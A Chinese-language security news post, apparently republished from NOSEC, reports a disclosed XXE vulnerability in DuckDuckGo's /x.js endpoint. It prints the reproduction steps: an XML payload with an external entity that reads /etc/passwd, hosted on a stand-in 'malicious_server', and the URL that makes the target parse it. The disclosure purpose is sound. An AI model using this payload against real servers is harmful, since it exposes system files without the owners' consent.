首页 安全防御正文

DuckDuckGo搜索引擎的XXE漏洞

访客 安全防御 2021-10-15 490 5

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。


DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。


漏洞详情


漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。


只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。


而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。


具体步骤如下


1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。


<?xm l version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>


2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml


3.返回的页面可以看到xm l文件解析结果



在确认了漏洞后,DuckDuckGo工作人员也对其表示了感谢。



本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场


来源:https://nosec.org/home/detail/2219.html


白帽汇从事信息安全,专注于安全大数据、企业威胁情报。


公司产品:FOFA- *** 空间安全搜索引擎、FOEYE- *** 空间检索系统、NOSEC-安全讯息平台。


为您提供: *** 空间测绘、企业资产收集、企业威胁情报、应急响应服务


版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。